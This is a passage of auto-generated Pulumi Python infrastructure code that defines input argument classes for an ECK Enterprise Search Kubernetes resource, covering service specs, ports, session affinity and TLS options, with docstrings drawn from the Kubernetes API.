Search pods. :param pulumi.Input[str] service_account_name: ServiceAccountName is used to check access from the current resource to a resource (eg. Elasticsearch) in a different namespace. Can only be used if ECK is enforcing RBAC on references. :param pulumi.Input[str] version: Version of Enterprise Search. """ if config is not None: pulumi.set(__self__, "config", config) if config_ref is not None: pulumi.set(__self__, "config_ref", config_ref) if count is not None: pulumi.set(__self__, "count", count) if elasticsearch_ref is not None: pulumi.set(__self__, "elasticsearch_ref", elasticsearch_ref) if http is not None: pulumi.set(__self__, "http", http) if image is not None: pulumi.set(__self__, "image", image) if pod_template is not None: pulumi.set(__self__, "pod_template", pod_template) if service_account_name is not None: pulumi.set(__self__, "service_account_name", service_account_name) if version is not None: pulumi.set(__self__, "version", version) @property @pulumi.getter def config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ Config holds the Enterprise Search configuration. """ return pulumi.get(self, "config") @config.setter def config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "config", value) @property @pulumi.getter(name="configRef") def config_ref(self) -> Optional[pulumi.Input['EnterpriseSearchSpecConfigRefArgs']]: """ ConfigRef contains a reference to an existing Kubernetes Secret holding the Enterprise Search configuration. Configuration settings are merged and have precedence over settings specified in `config`. """ return pulumi.get(self, "config_ref") @config_ref.setter def config_ref(self, value: Optional[pulumi.Input['EnterpriseSearchSpecConfigRefArgs']]): pulumi.set(self, "config_ref", value) @property @pulumi.getter def count(self) -> Optional[pulumi.Input[int]]: """ Count of Enterprise Search instances to deploy. """ return pulumi.get(self, "count") @count.setter def count(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "count", value) @property @pulumi.getter(name="elasticsearchRef") def elasticsearch_ref(self) -> Optional[pulumi.Input['EnterpriseSearchSpecElasticsearchRefArgs']]: """ ElasticsearchRef is a reference to the Elasticsearch cluster running in the same Kubernetes cluster. """ return pulumi.get(self, "elasticsearch_ref") @elasticsearch_ref.setter def elasticsearch_ref(self, value: Optional[pulumi.Input['EnterpriseSearchSpecElasticsearchRefArgs']]): pulumi.set(self, "elasticsearch_ref", value) @property @pulumi.getter def http(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpArgs']]: """ HTTP holds the HTTP layer configuration for Enterprise Search resource. """ return pulumi.get(self, "http") @http.setter def http(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpArgs']]): pulumi.set(self, "http", value) @property @pulumi.getter def image(self) -> Optional[pulumi.Input[str]]: """ Image is the Enterprise Search Docker image to deploy. """ return pulumi.get(self, "image") @image.setter def image(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "image", value) @property @pulumi.getter(name="podTemplate") def pod_template(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ PodTemplate provides customisation options (labels, annotations, affinity rules, resource requests, and so on) for the Enterprise Search pods. """ return pulumi.get(self, "pod_template") @pod_template.setter def pod_template(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "pod_template", value) @property @pulumi.getter(name="serviceAccountName") def service_account_name(self) -> Optional[pulumi.Input[str]]: """ ServiceAccountName is used to check access from the current resource to a resource (eg. Elasticsearch) in a different namespace. Can only be used if ECK is enforcing RBAC on references. """ return pulumi.get(self, "service_account_name") @service_account_name.setter def service_account_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "service_account_name", value) @property @pulumi.getter def version(self) -> Optional[pulumi.Input[str]]: """ Version of Enterprise Search. """ return pulumi.get(self, "version") @version.setter def version(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "version", value) @pulumi.input_type class EnterpriseSearchSpecConfigRefArgs: def __init__(__self__, *, secret_name: Optional[pulumi.Input[str]] = None): """ ConfigRef contains a reference to an existing Kubernetes Secret holding the Enterprise Search configuration. Configuration settings are merged and have precedence over settings specified in `config`. :param pulumi.Input[str] secret_name: SecretName is the name of the secret. """ if secret_name is not None: pulumi.set(__self__, "secret_name", secret_name) @property @pulumi.getter(name="secretName") def secret_name(self) -> Optional[pulumi.Input[str]]: """ SecretName is the name of the secret. """ return pulumi.get(self, "secret_name") @secret_name.setter def secret_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "secret_name", value) @pulumi.input_type class EnterpriseSearchSpecElasticsearchRefArgs: def __init__(__self__, *, name: pulumi.Input[str], namespace: Optional[pulumi.Input[str]] = None): """ ElasticsearchRef is a reference to the Elasticsearch cluster running in the same Kubernetes cluster. :param pulumi.Input[str] name: Name of the Kubernetes object. :param pulumi.Input[str] namespace: Namespace of the Kubernetes object. If empty, defaults to the current namespace. """ pulumi.set(__self__, "name", name) if namespace is not None: pulumi.set(__self__, "namespace", namespace) @property @pulumi.getter def name(self) -> pulumi.Input[str]: """ Name of the Kubernetes object. """ return pulumi.get(self, "name") @name.setter def name(self, value: pulumi.Input[str]): pulumi.set(self, "name", value) @property @pulumi.getter def namespace(self) -> Optional[pulumi.Input[str]]: """ Namespace of the Kubernetes object. If empty, defaults to the current namespace. """ return pulumi.get(self, "namespace") @namespace.setter def namespace(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "namespace", value) @pulumi.input_type class EnterpriseSearchSpecHttpArgs: def __init__(__self__, *, service: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceArgs']] = None, tls: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsArgs']] = None): """ HTTP holds the HTTP layer configuration for Enterprise Search resource. :param pulumi.Input['EnterpriseSearchSpecHttpServiceArgs'] service: Service defines the template for the associated Kubernetes Service object. :param pulumi.Input['EnterpriseSearchSpecHttpTlsArgs'] tls: TLS defines options for configuring TLS for HTTP. """ if service is not None: pulumi.set(__self__, "service", service) if tls is not None: pulumi.set(__self__, "tls", tls) @property @pulumi.getter def service(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceArgs']]: """ Service defines the template for the associated Kubernetes Service object. """ return pulumi.get(self, "service") @service.setter def service(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceArgs']]): pulumi.set(self, "service", value) @property @pulumi.getter def tls(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsArgs']]: """ TLS defines options for configuring TLS for HTTP. """ return pulumi.get(self, "tls") @tls.setter def tls(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsArgs']]): pulumi.set(self, "tls", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceArgs: def __init__(__self__, *, metadata: Optional[pulumi.Input[Mapping[str, Any]]] = None, spec: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecArgs']] = None): """ Service defines the template for the associated Kubernetes Service object. :param pulumi.Input[Mapping[str, Any]] metadata: ObjectMeta is the metadata of the service. The name and namespace provided here are managed by ECK and will be ignored. :param pulumi.Input['EnterpriseSearchSpecHttpServiceSpecArgs'] spec: Spec is the specification of the service. """ if metadata is not None: pulumi.set(__self__, "metadata", metadata) if spec is not None: pulumi.set(__self__, "spec", spec) @property @pulumi.getter def metadata(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ ObjectMeta is the metadata of the service. The name and namespace provided here are managed by ECK and will be ignored. """ return pulumi.get(self, "metadata") @metadata.setter def metadata(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "metadata", value) @property @pulumi.getter def spec(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecArgs']]: """ Spec is the specification of the service. """ return pulumi.get(self, "spec") @spec.setter def spec(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecArgs']]): pulumi.set(self, "spec", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecArgs: def __init__(__self__, *, cluster_ip: Optional[pulumi.Input[str]] = None, external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, external_name: Optional[pulumi.Input[str]] = None, external_traffic_policy: Optional[pulumi.Input[str]] = None, health_check_node_port: Optional[pulumi.Input[int]] = None, ip_family: Optional[pulumi.Input[str]] = None, load_balancer_ip: Optional[pulumi.Input[str]] = None, load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, ports: Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsArgs']]]] = None, publish_not_ready_addresses: Optional[pulumi.Input[bool]] = None, selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, session_affinity: Optional[pulumi.Input[str]] = None, session_affinity_config: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs']] = None, topology_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, type: Optional[pulumi.Input[str]] = None): """ Spec is the specification of the service. :param pulumi.Input[str] cluster_ip: clusterIP is the IP address of the service and is usually assigned randomly by the master. If an address is specified manually and is not in use by others, it will be allocated to the service; otherwise, creation of the service will fail. This field can not be changed through updates. Valid values are "None", empty string (""), or a valid IP address. "None" can be specified for headless services when proxying is not required. Only applies to types ClusterIP, NodePort, and LoadBalancer. Ignored if type is ExternalName. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies :param pulumi.Input[Sequence[pulumi.Input[str]]] external_ips: externalIPs is a list of IP addresses for which nodes in the cluster will also accept traffic for this service. These IPs are not managed by Kubernetes. The user is responsible for ensuring that traffic arrives at a node with this IP. A common example is external load-balancers that are not part of the Kubernetes system. :param pulumi.Input[str] external_name: externalName is the external reference that kubedns or equivalent will return as a CNAME record for this service. No proxying will be involved. Must be a valid RFC-1123 hostname (https://tools.ietf.org/html/rfc1123) and requires Type to be ExternalName. :param pulumi.Input[str] external_traffic_policy: externalTrafficPolicy denotes if this Service desires to route external traffic to node-local or cluster-wide endpoints. "Local" preserves the client source IP and avoids a second hop for LoadBalancer and Nodeport type services, but risks potentially imbalanced traffic spreading. "Cluster" obscures the client source IP and may cause a second hop to another node, but should have good overall load-spreading. :param pulumi.Input[int] health_check_node_port: healthCheckNodePort specifies the healthcheck nodePort for the service. If not specified, HealthCheckNodePort is created by the service api backend with the allocated nodePort. Will use user-specified nodePort value if specified by the client. Only effects when Type is set to LoadBalancer and ExternalTrafficPolicy is set to Local. :param pulumi.Input[str] ip_family: ipFamily specifies whether this Service has a preference for a particular IP family (e.g. IPv4 vs. IPv6). If a specific IP family is requested, the clusterIP field will be allocated from that family, if it is available in the cluster. If no IP family is requested, the cluster's primary IP family will be used. Other IP fields (loadBalancerIP, loadBalancerSourceRanges, externalIPs) and controllers which allocate external load-balancers should use the same IP family. Endpoints for this Service will be of this family. This field is immutable after creation. Assigning a ServiceIPFamily not available in the cluster (e.g. IPv6 in IPv4 only cluster) is an error condition and will fail during clusterIP assignment. :param pulumi.Input[str] load_balancer_ip: Only applies to Service Type: LoadBalancer LoadBalancer will get created with the IP specified in this field. This feature depends on whether the underlying cloud-provider supports specifying the loadBalancerIP when a load balancer is created. This field will be ignored if the cloud-provider does not support the feature. :param pulumi.Input[Sequence[pulumi.Input[str]]] load_balancer_source_ranges: If specified and supported by the platform, this will restrict traffic through the cloud-provider load-balancer will be restricted to the specified client IPs. This field will be ignored if the cloud-provider does not support the feature." More info: https://kubernetes.io/docs/tasks/access-application-cluster/configure-cloud-provider-firewall/ :param pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsArgs']]] ports: The list of ports that are exposed by this service. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies :param pulumi.Input[bool] publish_not_ready_addresses: publishNotReadyAddresses, when set to true, indicates that DNS implementations must publish the notReadyAddresses of subsets for the Endpoints associated with the Service. The default value is false. The primary use case for setting this field is to use a StatefulSet's Headless Service to propagate SRV records for its Pods without respect to their readiness for purpose of peer discovery. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] selector: Route service traffic to pods with label keys and values matching this selector. If empty or not present, the service is assumed to have an external process managing its endpoints, which Kubernetes will not modify. Only applies to types ClusterIP, NodePort, and LoadBalancer. Ignored if type is ExternalName. More info: https://kubernetes.io/docs/concepts/services-networking/service/ :param pulumi.Input[str] session_affinity: Supports "ClientIP" and "None". Used to maintain session affinity. Enable client IP based session affinity. Must be ClientIP or None. Defaults to None. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies :param pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs'] session_affinity_config: sessionAffinityConfig contains the configurations of session affinity. :param pulumi.Input[Sequence[pulumi.Input[str]]] topology_keys: topologyKeys is a preference-order list of topology keys which implementations of services should use to preferentially sort endpoints when accessing this Service, it can not be used at the same time as externalTrafficPolicy=Local. Topology keys must be valid label keys and at most 16 keys may be specified. Endpoints are chosen based on the first topology key with available backends. If this field is specified and all entries have no backends that match the topology of the client, the service has no backends for that client and connections should fail. The special value "*" may be used to mean "any topology". This catch-all value, if used, only makes sense as the last value in the list. If this is not specified or empty, no topology constraints will be applied. :param pulumi.Input[str] type: type determines how the Service is exposed. Defaults to ClusterIP. Valid options are ExternalName, ClusterIP, NodePort, and LoadBalancer. "ExternalName" maps to the specified externalName. "ClusterIP" allocates a cluster-internal IP address for load-balancing to endpoints. Endpoints are determined by the selector or if that is not specified, by manual construction of an Endpoints object. If clusterIP is "None", no virtual IP is allocated and the endpoints are published as a set of endpoints rather than a stable IP. "NodePort" builds on ClusterIP and allocates a port on every node which routes to the clusterIP. "LoadBalancer" builds on NodePort and creates an external load-balancer (if supported in the current cloud) which routes to the clusterIP. More info: https://kubernetes.io/docs/concepts/services-networking/service/#publishing-services-service-types """ if cluster_ip is not None: pulumi.set(__self__, "cluster_ip", cluster_ip) if external_ips is not None: pulumi.set(__self__, "external_ips", external_ips) if external_name is not None: pulumi.set(__self__, "external_name", external_name) if external_traffic_policy is not None: pulumi.set(__self__, "external_traffic_policy", external_traffic_policy) if health_check_node_port is not None: pulumi.set(__self__, "health_check_node_port", health_check_node_port) if ip_family is not None: pulumi.set(__self__, "ip_family", ip_family) if load_balancer_ip is not None: pulumi.set(__self__, "load_balancer_ip", load_balancer_ip) if load_balancer_source_ranges is not None: pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges) if ports is not None: pulumi.set(__self__, "ports", ports) if publish_not_ready_addresses is not None: pulumi.set(__self__, "publish_not_ready_addresses", publish_not_ready_addresses) if selector is not None: pulumi.set(__self__, "selector", selector) if session_affinity is not None: pulumi.set(__self__, "session_affinity", session_affinity) if session_affinity_config is not None: pulumi.set(__self__, "session_affinity_config", session_affinity_config) if topology_keys is not None: pulumi.set(__self__, "topology_keys", topology_keys) if type is not None: pulumi.set(__self__, "type", type) @property @pulumi.getter(name="clusterIP") def cluster_ip(self) -> Optional[pulumi.Input[str]]: """ clusterIP is the IP address of the service and is usually assigned randomly by the master. If an address is specified manually and is not in use by others, it will be allocated to the service; otherwise, creation of the service will fail. This field can not be changed through updates. Valid values are "None", empty string (""), or a valid IP address. "None" can be specified for headless services when proxying is not required. Only applies to types ClusterIP, NodePort, and LoadBalancer. Ignored if type is ExternalName. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies """ return pulumi.get(self, "cluster_ip") @cluster_ip.setter def cluster_ip(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "cluster_ip", value) @property @pulumi.getter(name="externalIPs") def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ externalIPs is a list of IP addresses for which nodes in the cluster will also accept traffic for this service. These IPs are not managed by Kubernetes. The user is responsible for ensuring that traffic arrives at a node with this IP. A common example is external load-balancers that are not part of the Kubernetes system. """ return pulumi.get(self, "external_ips") @external_ips.setter def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "external_ips", value) @property @pulumi.getter(name="externalName") def external_name(self) -> Optional[pulumi.Input[str]]: """ externalName is the external reference that kubedns or equivalent will return as a CNAME record for this service. No proxying will be involved. Must be a valid RFC-1123 hostname (https://tools.ietf.org/html/rfc1123) and requires Type to be ExternalName. """ return pulumi.get(self, "external_name") @external_name.setter def external_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "external_name", value) @property @pulumi.getter(name="externalTrafficPolicy") def external_traffic_policy(self) -> Optional[pulumi.Input[str]]: """ externalTrafficPolicy denotes if this Service desires to route external traffic to node-local or cluster-wide endpoints. "Local" preserves the client source IP and avoids a second hop for LoadBalancer and Nodeport type services, but risks potentially imbalanced traffic spreading. "Cluster" obscures the client source IP and may cause a second hop to another node, but should have good overall load-spreading. """ return pulumi.get(self, "external_traffic_policy") @external_traffic_policy.setter def external_traffic_policy(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "external_traffic_policy", value) @property @pulumi.getter(name="healthCheckNodePort") def health_check_node_port(self) -> Optional[pulumi.Input[int]]: """ healthCheckNodePort specifies the healthcheck nodePort for the service. If not specified, HealthCheckNodePort is created by the service api backend with the allocated nodePort. Will use user-specified nodePort value if specified by the client. Only effects when Type is set to LoadBalancer and ExternalTrafficPolicy is set to Local. """ return pulumi.get(self, "health_check_node_port") @health_check_node_port.setter def health_check_node_port(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "health_check_node_port", value) @property @pulumi.getter(name="ipFamily") def ip_family(self) -> Optional[pulumi.Input[str]]: """ ipFamily specifies whether this Service has a preference for a particular IP family (e.g. IPv4 vs. IPv6). If a specific IP family is requested, the clusterIP field will be allocated from that family, if it is available in the cluster. If no IP family is requested, the cluster's primary IP family will be used. Other IP fields (loadBalancerIP, loadBalancerSourceRanges, externalIPs) and controllers which allocate external load-balancers should use the same IP family. Endpoints for this Service will be of this family. This field is immutable after creation. Assigning a ServiceIPFamily not available in the cluster (e.g. IPv6 in IPv4 only cluster) is an error condition and will fail during clusterIP assignment. """ return pulumi.get(self, "ip_family") @ip_family.setter def ip_family(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "ip_family", value) @property @pulumi.getter(name="loadBalancerIP") def load_balancer_ip(self) -> Optional[pulumi.Input[str]]: """ Only applies to Service Type: LoadBalancer LoadBalancer will get created with the IP specified in this field. This feature depends on whether the underlying cloud-provider supports specifying the loadBalancerIP when a load balancer is created. This field will be ignored if the cloud-provider does not support the feature. """ return pulumi.get(self, "load_balancer_ip") @load_balancer_ip.setter def load_balancer_ip(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "load_balancer_ip", value) @property @pulumi.getter(name="loadBalancerSourceRanges") def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ If specified and supported by the platform, this will restrict traffic through the cloud-provider load-balancer will be restricted to the specified client IPs. This field will be ignored if the cloud-provider does not support the feature." More info: https://kubernetes.io/docs/tasks/access-application-cluster/configure-cloud-provider-firewall/ """ return pulumi.get(self, "load_balancer_source_ranges") @load_balancer_source_ranges.setter def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "load_balancer_source_ranges", value) @property @pulumi.getter def ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsArgs']]]]: """ The list of ports that are exposed by this service. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies """ return pulumi.get(self, "ports") @ports.setter def ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsArgs']]]]): pulumi.set(self, "ports", value) @property @pulumi.getter(name="publishNotReadyAddresses") def publish_not_ready_addresses(self) -> Optional[pulumi.Input[bool]]: """ publishNotReadyAddresses, when set to true, indicates that DNS implementations must publish the notReadyAddresses of subsets for the Endpoints associated with the Service. The default value is false. The primary use case for setting this field is to use a StatefulSet's Headless Service to propagate SRV records for its Pods without respect to their readiness for purpose of peer discovery. """ return pulumi.get(self, "publish_not_ready_addresses") @publish_not_ready_addresses.setter def publish_not_ready_addresses(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "publish_not_ready_addresses", value) @property @pulumi.getter def selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Route service traffic to pods with label keys and values matching this selector. If empty or not present, the service is assumed to have an external process managing its endpoints, which Kubernetes will not modify. Only applies to types ClusterIP, NodePort, and LoadBalancer. Ignored if type is ExternalName. More info: https://kubernetes.io/docs/concepts/services-networking/service/ """ return pulumi.get(self, "selector") @selector.setter def selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "selector", value) @property @pulumi.getter(name="sessionAffinity") def session_affinity(self) -> Optional[pulumi.Input[str]]: """ Supports "ClientIP" and "None". Used to maintain session affinity. Enable client IP based session affinity. Must be ClientIP or None. Defaults to None. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies """ return pulumi.get(self, "session_affinity") @session_affinity.setter def session_affinity(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "session_affinity", value) @property @pulumi.getter(name="sessionAffinityConfig") def session_affinity_config(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs']]: """ sessionAffinityConfig contains the configurations of session affinity. """ return pulumi.get(self, "session_affinity_config") @session_affinity_config.setter def session_affinity_config(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs']]): pulumi.set(self, "session_affinity_config", value) @property @pulumi.getter(name="topologyKeys") def topology_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ topologyKeys is a preference-order list of topology keys which implementations of services should use to preferentially sort endpoints when accessing this Service, it can not be used at the same time as externalTrafficPolicy=Local. Topology keys must be valid label keys and at most 16 keys may be specified. Endpoints are chosen based on the first topology key with available backends. If this field is specified and all entries have no backends that match the topology of the client, the service has no backends for that client and connections should fail. The special value "*" may be used to mean "any topology". This catch-all value, if used, only makes sense as the last value in the list. If this is not specified or empty, no topology constraints will be applied. """ return pulumi.get(self, "topology_keys") @topology_keys.setter def topology_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "topology_keys", value) @property @pulumi.getter def type(self) -> Optional[pulumi.Input[str]]: """ type determines how the Service is exposed. Defaults to ClusterIP. Valid options are ExternalName, ClusterIP, NodePort, and LoadBalancer. "ExternalName" maps to the specified externalName. "ClusterIP" allocates a cluster-internal IP address for load-balancing to endpoints. Endpoints are determined by the selector or if that is not specified, by manual construction of an Endpoints object. If clusterIP is "None", no virtual IP is allocated and the endpoints are published as a set of endpoints rather than a stable IP. "NodePort" builds on ClusterIP and allocates a port on every node which routes to the clusterIP. "LoadBalancer" builds on NodePort and creates an external load-balancer (if supported in the current cloud) which routes to the clusterIP. More info: https://kubernetes.io/docs/concepts/services-networking/service/#publishing-services-service-types """ return pulumi.get(self, "type") @type.setter def type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "type", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecPortsArgs: def __init__(__self__, *, port: pulumi.Input[int], app_protocol: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, node_port: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, target_port: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs']] = None): """ ServicePort contains information on service's port. :param pulumi.Input[int] port: The port that will be exposed by this service. :param pulumi.Input[str] app_protocol: The application protocol for this port. This field follows standard Kubernetes label syntax. Un-prefixed names are reserved for IANA standard service names (as per RFC-6335 and http://www.iana.org/assignments/service-names). Non-standard protocols should use prefixed names such as mycompany.com/my-custom-protocol. Field can be enabled with ServiceAppProtocol feature gate. :param pulumi.Input[str] name: The name of this port within the service. This must be a DNS_LABEL. All ports within a ServiceSpec must have unique names. When considering the endpoints for a Service, this must match the 'name' field in the EndpointPort. Optional if only one ServicePort is defined on this service. :param pulumi.Input[int] node_port: The port on each node on which this service is exposed when type=NodePort or LoadBalancer. Usually assigned by the system. If specified, it will be allocated to the service if unused or else creation of the service will fail. Default is to auto-allocate a port if the ServiceType of this Service requires one. More info: https://kubernetes.io/docs/concepts/services-networking/service/#type-nodeport :param pulumi.Input[str] protocol: The IP protocol for this port. Supports "TCP", "UDP", and "SCTP". Default is TCP. :param pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs'] target_port: Number or name of the port to access on the pods targeted by the service. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. If this is a string, it will be looked up as a named port in the target Pod's container ports. If this is not specified, the value of the 'port' field is used (an identity map). This field is ignored for services with clusterIP=None, and should be omitted or set equal to the 'port' field. More info: https://kubernetes.io/docs/concepts/services-networking/service/#defining-a-service """ pulumi.set(__self__, "port", port) if app_protocol is not None: pulumi.set(__self__, "app_protocol", app_protocol) if name is not None: pulumi.set(__self__, "name", name) if node_port is not None: pulumi.set(__self__, "node_port", node_port) if protocol is not None: pulumi.set(__self__, "protocol", protocol) if target_port is not None: pulumi.set(__self__, "target_port", target_port) @property @pulumi.getter def port(self) -> pulumi.Input[int]: """ The port that will be exposed by this service. """ return pulumi.get(self, "port") @port.setter def port(self, value: pulumi.Input[int]): pulumi.set(self, "port", value) @property @pulumi.getter(name="appProtocol") def app_protocol(self) -> Optional[pulumi.Input[str]]: """ The application protocol for this port. This field follows standard Kubernetes label syntax. Un-prefixed names are reserved for IANA standard service names (as per RFC-6335 and http://www.iana.org/assignments/service-names). Non-standard protocols should use prefixed names such as mycompany.com/my-custom-protocol. Field can be enabled with ServiceAppProtocol feature gate. """ return pulumi.get(self, "app_protocol") @app_protocol.setter def app_protocol(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "app_protocol", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of this port within the service. This must be a DNS_LABEL. All ports within a ServiceSpec must have unique names. When considering the endpoints for a Service, this must match the 'name' field in the EndpointPort. Optional if only one ServicePort is defined on this service. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="nodePort") def node_port(self) -> Optional[pulumi.Input[int]]: """ The port on each node on which this service is exposed when type=NodePort or LoadBalancer. Usually assigned by the system. If specified, it will be allocated to the service if unused or else creation of the service will fail. Default is to auto-allocate a port if the ServiceType of this Service requires one. More info: https://kubernetes.io/docs/concepts/services-networking/service/#type-nodeport """ return pulumi.get(self, "node_port") @node_port.setter def node_port(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "node_port", value) @property @pulumi.getter def protocol(self) -> Optional[pulumi.Input[str]]: """ The IP protocol for this port. Supports "TCP", "UDP", and "SCTP". Default is TCP. """ return pulumi.get(self, "protocol") @protocol.setter def protocol(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "protocol", value) @property @pulumi.getter(name="targetPort") def target_port(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs']]: """ Number or name of the port to access on the pods targeted by the service. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. If this is a string, it will be looked up as a named port in the target Pod's container ports. If this is not specified, the value of the 'port' field is used (an identity map). This field is ignored for services with clusterIP=None, and should be omitted or set equal to the 'port' field. More info: https://kubernetes.io/docs/concepts/services-networking/service/#defining-a-service """ return pulumi.get(self, "target_port") @target_port.setter def target_port(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs']]): pulumi.set(self, "target_port", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs: def __init__(__self__): pass @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs: def __init__(__self__, *, client_ip: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs']] = None): """ sessionAffinityConfig contains the configurations of session affinity. :param pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs'] client_ip: clientIP contains the configurations of Client IP based session affinity. """ if client_ip is not None: pulumi.set(__self__, "client_ip", client_ip) @property @pulumi.getter(name="clientIP") def client_ip(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs']]: """ clientIP contains the configurations of Client IP based session affinity. """ return pulumi.get(self, "client_ip") @client_ip.setter def client_ip(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs']]): pulumi.set(self, "client_ip", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs: def __init__(__self__, *, timeout_seconds: Optional[pulumi.Input[int]] = None): """ clientIP contains the configurations of Client IP based session affinity. :param pulumi.Input[int] timeout_seconds: timeoutSeconds specifies the seconds of ClientIP type session sticky time. The value must be >0 && <=86400(for 1 day) if ServiceAffinity == "ClientIP". Default value is 10800(for 3 hours). """ if timeout_seconds is not None: pulumi.set(__self__, "timeout_seconds", timeout_seconds) @property @pulumi.getter(name="timeoutSeconds") def timeout_seconds(self) -> Optional[pulumi.Input[int]]: """ timeoutSeconds specifies the seconds of ClientIP type session sticky time. The value must be >0 && <=86400(for 1 day) if ServiceAffinity == "ClientIP". Default value is 10800(for 3 hours). """ return pulumi.get(self, "timeout_seconds") @timeout_seconds.setter def timeout_seconds(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "timeout_seconds", value) @pulumi.input_type class EnterpriseSearchSpecHttpTlsArgs: def __init__(__self__, *, certificate: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsCertificateArgs']] = None, self_signed_certificate: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs']] = None): """ TLS defines options for configuring TLS for HTTP. :param 